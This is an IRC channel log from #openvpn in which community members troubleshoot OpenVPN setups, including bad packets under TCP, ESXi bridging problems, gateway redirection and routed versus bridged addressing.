running screen, so I just run openvpn from the console most of the time anyway 14:34 < wachpwnski> off topic, but do you know how to auto respond with a user name and a password in a bash script? 14:35 < pekster> Look up the 'expect' package, then ask yourself if you really want to be doing that 14:35 < pekster> Other way around perhaps ;) 14:35 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 14:35 <@ecrist> wachpwnski: openvpn allows you to put user/pass in a file 14:36 < pekster> If that's the use-case, yes. Of course, if you're not using the user/pass auth mehanism, doing so really isn't any better than leaving your private key unencrypted anyway 14:36 < wachpwnski> oh... 14:37 < wachpwnski> sadly my user pass is something that is non-human maintainable 14:37 < kisom> pekster: The issue with bad packets didn't have anything to do with lzo. I disabled it all together and the client still reports bad packets, both on Windows and Linux. http://pastebin.ca/2316439 See line 254 14:37 < wachpwnski> I would rather monitor my computers access and key my drive encrypted 14:38 < wachpwnski> ecrist: what do i put in the config for my user and pass? 14:40 < pekster> kisom: What verb level is that? Too high of a verb level and it's actually going to interfere with normal operation as it writes so much to disk and generates many dozens of interrupts for every packet processed 14:41 -!- medum [kevin@whore.n2l.org] has joined #openvpn 14:41 < pekster> kisom: If you're not a developer working to debug a very specific problem in the source code, stop using anything higher than verb 4 for your daily operation 14:41 < kisom> pekster: verb 13. But it doesn't matter, if I use verb 3 I get all the same error. 14:41 < pekster> Well, that high of a verbosity is hiding potentially useful messages at verb 4, such as a backtrack window warning 14:42 < kisom> I checked for that, there are no warnings at all. 14:42 < kisom> MTU is consistent, so is lzo 14:42 -!- mirco [~mirco@p50806731.dip.t-dialin.net] has joined #openvpn 14:44 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 14:46 < pekster> Then I'm not sure what to suggest. Maybe test crypto on both ends with the same cipher you're using (ie: openvpn --test-crypto --cipher $c --keysize $s --secret k.key) 14:47 -!- Xgates [~Xgates@unaffiliated/xgates] has joined #openvpn 14:47 < pekster> Could be packet mangling too between peers, or hardware (CPU/NIC) issues too 14:47 < Xgates> hi guys 14:47 < kisom> My gut feeling tells me that the Arch package is broken. I'll try and recompile from scratch and then submit a bug report to whoever is responsible. 14:48 < pekster> Are you using any screwy CFLAGS or optimizations? 14:48 < kisom> No, I use vanilla 14:48 < pekster> Try with something standard like just "-O2 -march=native" or something. Could be openssl at fault too since openvpn is heavily bound to it for crypto ops 14:49 < kisom> Hmm, might as well try and change ciphers. I recently upgraded OpenSSL so it might have something to do with it 14:49 < Xgates> when I use OpenVPN on a supported smart phone that can use OpenVPN Connect, I feel more comfortable with this, instead of using L2TP, because with L2TP your storing a password and secret on the device, whereas with OpenVPN Connect you import your actual certs & keys which to me seems better/safer? Any thoughts on that? 14:52 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 14:55 -!- dazo_afk is now known as dazo 15:02 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 15:05 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has joined #openvpn 15:32 < kisom> This is getting all crazy. The connection works great when using UDP, but not when using TCP. 15:33 < kisom> Makes no sense. 15:37 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:37 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 15:38 -!- wachpwnski [~Adium@c-67-176-229-52.hsd1.in.comcast.net] has left #openvpn [] 15:42 -!- medum [kevin@whore.n2l.org] has left #openvpn [] 15:48 < Xgates> any thoughts here on L2TP vs OpenVPN Connect? 15:48 < Xgates> security wise, etc.... 15:49 < kisom> Xgates: OpenVPN Connect works better imo. 15:49 < kisom> It also retains the connection after the device wakes up from sleep 15:50 < Xgates> well I figured it's more secure, don't like the idea of adding in a password and secret on the phone being stored, rather import the actual certs & keys, seems more secure, but not sure... 15:50 < kisom> Doesn't matter. The private key is still stored at the phone. 15:50 < Xgates> hmm 15:52 < Xgates> thanks, gotta run... 15:52 -!- Xgates [~Xgates@unaffiliated/xgates] has quit [Quit: Xgates] 15:52 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection] 15:56 -!- p3rror [~mezgani@41.249.81.68] has joined #openvpn 15:57 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has joined #openvpn 16:06 < leg3nd> afternoon everyone, I am currently trying to get my VPN functioning on my Ubuntu virtual machine. I had this configuration on another (non-vm) before and it worked fine, yet now I am unable to access the hosts within the VPN network when connected. The authentication phase works fine, and the interface opens, I am able to ping the VPN server but not any other hosts. More infomation: http://paste.pound-python.org/raw/6pCUqRCSVryk6wrWrYCq/ - I apprec 16:06 < leg3nd> iate any tips. 16:11 < pekster> leg3nd: Yous shouldn't push the network range for the local VPN network in a bridged setup like that as the client has a link-local route when the address is added 16:12 < leg3nd> pekster, I have tried it without the push options as well but to no avail. 16:12 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 16:12 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 16:13 < pekster> Where's the client connecting in from? 16:16 < leg3nd> pekster, Just tested it without the option again - same result. 16:16 < pekster> Well, regardless you don't want to push the network range you're on-link with 16:17 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 16:17 < pekster> What's the purpose of 'redirect-gateway' ? You really want to take your VPN client's default gateway and send it to a VM inside an ESX network? 16:18 < pekster> Hence the curiousity of where the native client is relative to your LAN 16:19 -!- Shway [~Shway@216.208.252.66] has quit [Quit: Want to be different? Try HydraIRC -> http://www.hydrairc.com <-] 16:19 < leg3nd> Ideally, but not a big deal either way. 16:20 < leg3nd> The client is connecting is on an external network with no egress firewall rules, I would like the redirect-gateway to secure the traffic in certain use cases. Here is some client debug info: http://paste.pound-python.org/show/MLyszBdltTV1RJTOxfoW/ 16:22 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Quit: Leaving, Ya'LL!] 16:22 < pekster> You have mis-matched comp-lzo settings; the client has 'yes' while the server is implicitly using the default 'adaptive' mode 16:22 < pekster> You should match this on both your peers 16:23 < leg3nd> Okay, thanks. Let me give that a try. 16:23 < pekster> That's not the cause of your issue though 16:23 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 16:23 < leg3nd> Okay 16:23 < pekster> Looks like you have a problem getting to ghe gateway environment based on the routing table on the client 16:23 <@dazo> comp-lzo adaptive and comp-lzo yes are compatible 16:24 <@dazo> I even thing comp-lzo no is compatible too ... but not having --comp-lzo at all, will not be compatible 16:24 < pekster> Your default route is via the server's IP, but the only route it has to get there is via tap0 16:25 < kisom> pekster: After compiling OpenVPN on several systems and with different OpenSSL versions I can confirm that the bug really is within openvpn :) 16:25 < pekster> leg3nd: Oh, I'm sorry, I missed your rmeote statement. Nevermind, if 192.168.1.254 is your client's physical gw, you're good 16:25 < kisom> Whatever, I'll rollback to 2.2. 16:25 < leg3nd> yeah that is the physical client GW 16:26 < leg3nd> it seems to be routing out of the client network without issues 16:26 < pekster> I'd try tcpdumping on the br0 interface on the server 16:26 < pekster> I'm wondering if ESX isn't doing something odd with the packets via its own filtering mechanism 16:26 < leg3nd> yeah thats kinda what i was thinking 16:27 < leg3nd> i couldnt seem to find any issues with ESX, but I'll look a little deeper. 16:28 < pekster> That setup looks fine, and with the route for 192.168.254.0/24 via tap0 (ie: the link route) it's going to make an on-link request for the IP: ie: ARP, ARP-reply, then send the ping. Watch for each phase of that process. If you don't see it on br0, try dumping on tap0 on the server, then on the tap0 on the client. Somewhere it has to be getting dropped (or the reply dropped, perhaps) 16:28 < pekster> FYI, on Linux the tools 'ip route show' and 'ip addr show' for routing and addressing are shorter and more informative (it won't help here, but in the future those are the preferred tools) 16:31 < pekster> kisom: Can't speak to your particular situation, but it's not an overall flaw in how 2.3.0 works since many other environments are just fine with the 2.3.x series. I've been using the rc builds and now the official 2.3.0 build on Windows and 3 Linux distros without issue. It's odd to blame openvpn specifically since a crypto failure is likely to be occurring in libopenssl specifically; I'm sure the openvpn devs would love a detailed ... 16:31 < pekster> ... bugreport if you have actually traced it to a bug "really" within openvpn so they can fix it 16:32 < pekster> That's the funny thing about dynamic linking 16:33 -!- sw0rdfish is now known as Guest40293 16:33 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 16:33 < leg3nd> alright ill give that a try, just talked to a coworker about it and he said there could be an issue with the ESXi configuration possibly also, so i'll check both out. 16:33 < leg3nd> thanks for the help pekster 16:33 < kisom> pekster: Care to try and reproduce the bug? I've done it on both Ubuntu and Arch on 2.3.0. 16:37 < pekster> Reproduce it how? All you've suggested is that mysteriously upgrading to 2.3.0 breaks things. I've refuted that by thte hundreds of people not you that are running it without issue. Proof by counter-example 16:37 < kisom> pekster: That's because I haven't told you. 16:37 < pekster> Right. 16:37 < kisom> Use tcp-server and send packets in a higher rate than the network supports. 16:38 < kisom> I just UDP-flooded the host over the VPN connection. 16:38 < kisom> Well, actually I flooded the client from the server. 16:38 < pekster> What's your queue length on both the virtual and physical adapters, and any special qdiscs? 16:39 < kisom> 1000 on both 16:40 < kisom> I tried compiling both 2.3 and 2.2 on both systems. 2.2 handles the flood without issues. 16:40 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has quit [Ping timeout: 276 seconds] 16:40 < kisom> And no, no special qdiscs. Both systems are pretty much vanilla. 16:41 -!- Guest40293 [sw0rdfish@unaffiliated/sw0rdfish] has quit [Quit: Leaving, Ya'LL!] 16:45 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has joined #openvpn 16:45 < leg3nd> pekster, the client doesn't seem to be getting ARP replys for the gateway (192.168.254.1) - but there are replys for the VPN server (251) and the client (26). - http://paste.pound-python.org/show/DWqirK6LM25wvxUQDz5K/ 16:48 -!- MeanderingCode_ [~Meanderin@71-213-185-188.albq.qwest.net] has joined #openvpn 16:49 -!- MeanderingCode [~Meanderin@71-213-185-188.albq.qwest.net] has quit [Ping timeout: 248 seconds] 16:50 < pekster> leg3nd: That's dumped from what device, the server's br0, or the client's tap0? 16:50 < leg3nd> server br0 16:50 < pekster> Sounds like an ESX thing then 16:50 < pekster> Pretty sure your vSwitch is hosing you 16:51 < DougEFresh> screen rocks 16:51 < leg3nd> actually it was server tap0 16:51 < leg3nd> but i think youre right 16:53 < pekster> There shouldn't be a difference unless there's crazy bridge-level filtering (ebtables & friends) 16:53 < pekster> It still has to go to the ESX vSwitch, and it can do (or drop) with it what i likes 16:54 < pekster> It's likely being too smart for its own good and stopping you from doing a bridge. You could route instead which might work better 16:54 < pekster> !tunortap 16:54 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 16:54 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 16:54 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn 16:57 -!- sw0rdfish- [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn 16:57 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has quit [Ping timeout: 256 seconds] 16:57 -!- sw0rdfish- [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host] 16:57 -!- sw0rdfish- [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 16:59 < neilhwatson> Hello, I'm trying to get an openvpn tunnel that redirects the default gateway. The client logs show this error: 16:59 < neilhwatson> NOTE: unable to redirect default gateway -- VPN gateway parameter (--route-gateway or --ifconfig) is missing 17:00 < neilhwatson> Is the trouble on the server or the client? 17:00 < pekster> Clearly the client. You can't redirect a gateway if you don't tell the client what that gateway is; push the required directive from the server or define it on the client using the listed parameter 17:01 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 17:02 < neilhwatson> I have this in the server config: "push "redirect-gateway def1" and "pull" in the client config. What did I miss? 17:03 <@krzee> !configs 17:03 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 17:07 < neilhwatson> Here they are: https://gist.github.com/neilhwatson/5009289 17:07 <@vpnHelper> Title: Open vpn configs (at gist.github.com) 17:09 -!- sw0rdfish- is now known as sw0rdfish 17:14 < neilhwatson> server version 2.1.3, client version 2.2.1. 17:14 < pekster> You should follow the howto. You can't push a public IP when your server is using an rfc1918 IP, at least not without use 'mode p2p' instead of the default net30 (you probably don't want to do this anyway.) You aren't assigning your client an IP or pushing one, and you haven't pushed a gateway IP 17:15 < pekster> There's quite a bit wrong with the addresing in that setup 17:15 < pekster> !howto 17:15 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 17:15 < pekster> Don't even try to get the gateway redirection set up until you can ping the server's VPN IP from your client. Until you can do that, you don't actually have a working VPN tunnel 17:16 < neilhwatson> 10.0.0.1? I can ping that. 17:17 < pekster> Then why does line 31 say "public IP" ? 17:17 < pekster> 10.0.0.2 is not a public IP 17:17 < neilhwatson> It not 10.0.0.2 It is a public IP. I remove it for the public paste. 17:19 < pekster> You've manually set up the addressing on the client? 17:19 -!- erry [erry@freenode/staff/erry] has quit [Quit: Segmentation fault] 17:20 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 17:20 -!- erry_ is now known as erry 17:21 < neilhwatson> I don't think so. I believe line 31 does that. 17:22 < pekster> on the sever, yes. 17:23 < pekster> How has your *client* been configured to use the correct addressing? 17:23 < neilhwatson> Sorry, I don't follow you. 17:23 < pekster> How has tun0 been configured? 17:23 < pekster> You are not pushing the IP from the server, and your client config does not use an ifconfig statement 17:24 < pekster> Are you manually invoking ifconfig or /sbin/ip on the client after you connect? Is tun0 already up and pre-populated with the addressing info? 17:26 < neilhwatson> I don't recall how I created tun0 initially. Here is what it looks like: https://gist.github.com/neilhwatson/5009398 17:26 <@vpnHelper> Title: client tun0 (at gist.github.com) 17:26 < pekster> Ah, okay, so you've statically configured it. Then add the gateway (this is your point-to-point address of 10.0.0.1, or the server's IP) manually in your client config via 'route-gateway' 17:27 < pekster> Just like the client error message says 17:27 < pekster> You can't push options in a p2p setup like you have (that's only valid in 'mode server' which you are not using, apparently.) 17:28 < pekster> You can put 'redirect-gateway def1' in your client config though. Do that with the 'route-gateway' option and you should be set 17:28 < neilhwatson> Is mode server better? I'm all for doing it the standard way. 17:28 < pekster> Well, depends on what you want. You can't easily manage the public addresing like you have now in the server mode 17:29 < pekster> So if you have already handled your upstream routing to deal with sending the public IP to the server and the server firewall allows the forwarded traffic to the client, you might as well stick with what you have 17:29 < neilhwatson> OK. Thanks. I'll give it a go. 17:29 -!- MeanderingCode [~Meanderin@71-213-185-188.albq.qwest.net] has joined #openvpn 17:29 < pekster> If what I just said makes no sense to you, then you're going to be on your own becuase your setup is pretty complicated for what I think you're trying to do. Most people don't assign a p2p address with a public IP like you're doing 17:30 -!- MeanderingCode_ [~Meanderin@71-213-185-188.albq.qwest.net] has quit [Ping timeout: 244 seconds] 17:30 < pekster> I mean, it's valid to do this, it just requires everything to be routed in just the right way beforehand or it won't work 17:33 * pekster didn't actually know it was allowed to use X509/TLS in p2p mode, but apparently it is, since I was able to clone your setup and launch a service that way. Go figure 17:35 < pekster> neilhwatson: Come to think of it, the pull/push might work too since there is actually a control channel. In that case you'd just need to do: push "route-gateway 10.0.0.1" 17:35 < pekster> I'm not actually sure offhand if that works or not 17:35 < neilhwatson> My goal is to give a computer with dynamic ISP IP at static IP from a remote server and tunnel all traffic through. How would you do it? 17:36 < pekster> No, that's a fine way to do it, assuming your public IP you've assigned the client is *routed* and not on-link (this is a very critical distinction) 17:36 < pekster> Is that the case? 17:36 < neilhwatson> How do I confirm that? 17:37 < pekster> What is the server? How did you get the "" address? 17:38 < neilhwatson> From the datacenter staff. 17:38 < pekster> Okay. And you have a separate IP that the server uses for its own uplink, right? 17:38 < neilhwatson> Yes 17:38 < neilhwatson> Networking hurts my brain at times. 17:38 < pekster> You still need this IP you're assigning the client routed, not on-link. I guess we'll known soon enough if it worked 17:39 < pekster> If you just got a "2nd IP" assigned on your Ethernet link, it's not routed, but expected to be on-link and respond to ARPs (which would mean you'd need to bridge with tap, not use tun) 17:39 < pekster> tun=routing, tap=bridging 17:40 < pekster> So, back to your original config, try just adding what I said earlier: push "route-gateway 10.0.0.1" 17:40 < pekster> Then reconnect the client 17:40 < pekster> See if that error goes away 17:40 < neilhwatson> Stand by 17:41 < kisom> pekster: Did you try and reproduce the issue I'm having with tcp-server? 17:41 -!- dazo is now known as dazo_afk 17:42 < pekster> kisom: Not yet. I'll poke at it and see what I find though; it sounds curious 17:43 < neilhwatson> Something went wrong. A new route was set but traffic did not seem to go anywhere. When I stopped the client the routing returned to what is was before. 17:44 < kisom> pekster: Roger. It seems flooding the server from the client side does not reproduce it, you must flood from the server side. 17:44 < pekster> Either a firewall problem, or this public IP is not routed to you neilhwatson 17:44 < neilhwatson> I cleared my fw rules to be sure. Client logs show this: 17:44 < neilhwatson> Feb 21 18:40:43 ettin ovpn-ettin[23549]: PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1,route-gateway 10.0.0.1' 17:44 < neilhwatson> Feb 21 18:40:43 ettin ovpn-ettin[23549]: OPTIONS IMPORT: route options modified 17:44 < neilhwatson> Feb 21 18:40:43 ettin ovpn-ettin[23549]: OPTIONS IMPORT: route-related options modified 17:44 < neilhwatson> Feb 21 18:40:43 ettin ovpn-ettin[23549]: ROUTE default_gateway=72.138.34.1 17:44 < pekster> neilhwatson: This server is Linux? Can you pastebin 'iptables-save -c' ? and the output of 'cat /proc/sys/net/ipv4/ip_forward' ? 17:45 < neilhwatson> Both hosts are linux 17:45 < pekster> Yea, so you're getting thte push 17:45 < pekster> Let's look at the firewall and IP forwarding 17:45 -!- MeanderingCode [~Meanderin@71-213-185-188.albq.qwest.net] has quit [Ping timeout: 255 seconds] 17:46 < pekster> kisom: Yea. Might be a day or two (family stuff, and I stayed up way later than I should have last night hunting the last problem I was motivated to fix :) 17:46 < neilhwatson> ip_forward is 1 on both. Iptables are clear and default to accept. 17:46 < kisom> pekster: Not a problem. I'll write down the details so I can reproduce it later. 17:47 < kisom> Anyways, time to sleep. nn. 17:47 < pekster> neilhwatson: What do you mean 'clear'? iptables-save should still show you something even if there are no rules. Or do you mean your rules look *exactly* like this: http://paste.kde.org/677966/ 17:49 < neilhwatson> https://gist.github.com/neilhwatson/5009548 17:49 <@vpnHelper> Title: iptables (at gist.github.com) 17:50 < pekster> Looks like the 2nd IP on your server is on-link, not routed. Tell upstream (your provider) you want it routed to the server's primary IP 17:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 17:50 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 17:51 < pekster> That, or create a brdige with tap0 and your existing public interface on the server, put your public IP on the bridge, and connect your VPN in tap mode to that bridge and set the IP that way on your client 17:51 < pekster> Both end up doing the same thing 17:52 < neilhwatson> That IP worked a few weeks ago as a different VM, which is now retired. Could the fact the server is a VM be an issue? 17:52 < pekster> It doesn't work becuase there's no link 17:52 < pekster> tun=routed 17:53 < pekster> If you don't understand the difference between a routed and bridged network, this enetire setup is quite frankly beyond what you should be attempting to do 17:54 < pekster> You have 2 options, exactly as I said a moment ago: either tell your provider to route this 2nd IP to you via the server's primary IP, or use openvpn in tap mode and connect it to a bridge that you create on your server's upstream-facing interface 17:55 < pekster> Those are your only 2 options if you want the client to have a direct public IP 17:55 < neilhwatson> Let me think about it. Thanks for your help. 17:55 < pekster> Your 3rd option is to follow the classic howto guide online, give the client a private IP (rfc1918) and NAT the traffic 17:56 < pekster> If you choose to go that route (classic priivate IP space + NAT) these are the relevant guides as the setup is a bit more "standard" than the speciality setup you have now 17:56 < pekster> the basic howto is here: 17:56 < pekster> !howto 17:56 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 17:56 < pekster> And a redirection setup on top of that is: 17:56 < pekster> !redirect 17:56 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 17:56 <@vpnHelper> http://ircpimps.org/redirect.png 17:57 < neilhwatson> Yes, I have that booked marked. 17:57 < pekster> It's not super-hard to turn your setup in a tap (bridged) setup 17:58 < neilhwatson> I prefer to avoid NAT. NAT is always off putting. 17:58 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Quit: Leaving, Ya'LL!] 17:58 < pekster> However, that would require removing the addressing from the server-side, and you'd need to set up the bridge manually since the primary server IP needs to go on the bridge interface, *not* the physical interface. Both tap0 (or w/e you call your tap device) and your physical NIC need to go into the bridge 17:58 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn 17:58 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host] 17:58 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 17:59 < pekster> Then you simply connect the client to the VPN and give it an IP like you would any other interface, and it joins the server just like a network switch (bridged is basically a "virtual switch" for Ethernet links) 18:00 < pekster> Ah, we have a factoid for that too: 18:00 < pekster> !bridge 18:00 <@vpnHelper> "bridge" is (#1) http://openvpn.net/index.php/documentation/miscellaneous/ethernet-bridging.html for the doc or (#2) http://openvpn.net/index.php/documentation/faq.html#bridge1 for info from the FAQ or (#3) also see !tunortap and !layer2 and read --server-bridge in the manual (!man) or (#4) also see !whybridge 18:02 -!- raidz is now known as raidz_away 18:05 < pekster> Anyway, I'm out for a bit. Good luck - you're closer than you think, you just need to fix the routed vs bridged problem you have 18:06 < pekster> (oh, and if you bridge, you don't set your gateway to 10.0.0.1, since that address becomes meaningless - the server won't have a "separate" VPN IP if you bridge, and your client will use whatever your ISP's router is as it's gateway.) 18:07 < neilhwatson> Right, it's a lower level. Thanks for the tips. I'll probably sleep on it. 18:11 -!- JSharpe [~JSharpe@188.227.181.234] has quit [Quit: Leaving] 18:15 < JesseC> When you setup an openvpn server, is it possible to assign an address to the server that's in the same subnet as the dhcp addresses handed out to the clients? 18:15 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 18:16 < JesseC> ie, you connect to the server via the public ip, but once on the vpn you can ssh into it using an internal vpn ip 18:17 -!- BtbN [~btbn@btbn.de] has left #openvpn ["Verlassend"] 18:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 18:37 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn 18:42 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 624 seconds] 18:58 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has joined #openvpn 18:58 < leg3nd> hey pekster, just wanted to let you know the issue was indeed with the virtual adapter - I changed it to different type in ESXi and the VPN works as intended. Thank you for your help. 19:04 -!- leg3nd [~leg3nd@unaffiliated/leg3nd] has quit [Ping timeout: 260 seconds] 19:13 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 19:15 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 19:16 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 19:29 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 19:34 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 19:34 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 19:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:25 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 20:39 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:46 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 21:01 -!- mirco_ [~mirco@p50805CBE.dip.t-dialin.net] has joined #openvpn 21:03 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 252 seconds] 21:04 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 21:04 -!- mirco [~mirco@p50806731.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 21:04 -!- mirco_ is now known as mirco 21:07 -!- mirco [~mirco@p50805CBE.dip.t-dialin.net] has quit [Quit: mirco] 21:17 < DougEFresh> openvpn and pfsense and fw rules are making me lose my mind 21:28 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn 21:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 21:49 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza] 22:27 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 22:28 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Read error: Connection reset by peer] 22:40 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:43 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host] 22:43 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 22:43 -!- mode/#openvpn [+v hazardous] by ChanServ 23:00 -!- Devastator- [~devas@186.214.110.17] has joined #openvpn 23:01 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 244 seconds] 23:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 23:05 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 245 seconds] 23:09 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 256 seconds] 23:17 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 23:18 -!- mattock_afk is now known as mattock 23:18 -!- mattock [~mattock@raidz.im] has quit [Changing host] 23:18 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 23:18 -!- mode/#openvpn [+o mattock] by ChanServ 23:18 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 23:18 -!- raidz_away is now known as raidz 23:18 -!- raidz [~raidz@raidz.im] has quit [Changing host] 23:18 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 23:18 -!- mode/#openvpn [+o raidz] by ChanServ 23:20 -!- p3rror [~mezgani@41.249.81.68] has quit [Ping timeout: 264 seconds] 23:54 -!- odoacre_ is now known as odoacre 23:54 -!- nickmoeck [~nickmoeck@205.185.118.253] has joined #openvpn 23:58 -!- baobeiiii [~baobeiiii@180.155.14.35] has quit [Read error: Connection reset by peer] 23:58 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn --- Day changed Fri Feb 22 2013 00:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 00:14 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn 00:14 < xkernel_> what will happen if I didn't specify MTU in the server and client conf? 00:17 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [] 00:24 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection] 00:31 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has quit [Ping timeout: 276 seconds] 00:37 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn 00:38 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 00:47 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 00:53 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has quit [Ping timeout: 276 seconds] 00:55 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn 00:56 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [] 01:00 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 01:01 -!- xkernel_ [~xkernel@gateway/tor-sasl/xkernel] has quit [Ping timeout: 276 seconds] 01:03 -!- baobeiiii_ [~baobeiiii@180.155.14.35] has joined #openvpn 01:06 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Ping timeout: 245 seconds] 01:22 -!- baobeiiii__ [~baobeiiii@180.155.14.35] has joined #openvpn 01:22 -!- baobeiiii_ [~baobeiiii@180.155.14.35] has quit [Read error: Connection reset by peer] 01:39 -!- Teck7__ [~teck7@69.157.154.143] has joined #openvpn 01:40 -!- Teck7 [~teck7@76.65.60.225] has quit [Read error: Connection reset by peer] 02:05 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 02:05 -!- krzee 